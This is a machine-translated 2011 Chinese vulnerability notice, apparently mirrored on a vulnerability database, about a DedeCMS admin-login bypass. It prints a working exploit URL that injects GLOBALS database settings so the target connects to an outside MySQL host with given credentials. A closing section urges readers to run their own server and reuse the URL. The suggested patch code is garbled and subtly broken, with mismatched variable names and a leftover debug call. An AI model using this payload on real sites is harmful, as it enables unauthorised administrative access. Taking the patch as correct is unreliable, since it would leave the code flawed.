Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201131562
HistoryAug 12, 2011 - 12:00 a.m.

DEDECMS free account password directly into the background-bug warning-the black bar safety net

2011-08-1200:00:00
佚名
www.myhack58.com
7
JSON

As is well known, due to the use of simple, customer base, and more, weaving dreams CMS has been broke manyvulnerabilities. Today xiaobian in the group to get the woven dream official forum, a moderator and reliable message:“DEDECMS explosion serious securityvulnerability, the recent official will release the patch, hope everyone to pay attention to the patch dynamics.”

Invasionas follows: http://www.xxx.comweaving dreams website back office/login. php? dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
The top black bottom yellow words on the letters changed to the current verification code, you can directly enter the website backstage.

Xiaobian analysis about it, thisvulnerabilitythe premise is MUST to get the backend path can be achieved, therefore we must develop the habit of using DEDECM the establishment of the station when you change back the name of the habit. Next to the official solution:

Solution:
Find the include/common. inc. php file, put

foreach($_REQUEST as $_k= > $_v)
{
var_dump($_k);
if( strlen($k)>0 && preg_match('#^(cfg|GLOBALS)#',$_k) )
{
exit(‘Request var not allow!’);
}
}

Replaced

//Check and registration outside the submitted variables
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k= > $_v) {
CheckRequest($_k);
CheckRequest($val[$k]);
}
} else
{
if( strlen($val)>0 && preg_match('#^(cfg|GLOBALS)#',$val) )
{
exit(‘Request var not allow!’);
}
}
}
CheckRequest($_REQUEST);

==============================================Lustful dividing line==================================================

!

When you see this figure at the time. Do not panic,do not be surprised. Not the dede of thevulnerabilityis blocked,but because[the Black wide big cow’] (<http://hi.baidu.com/0x�н�/&gt;)have been playing tired. Then you had to Own the local fight a mysql server. Your own change login. php? dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root among the connected accounts key slightly. I wish Jun good luck

JSON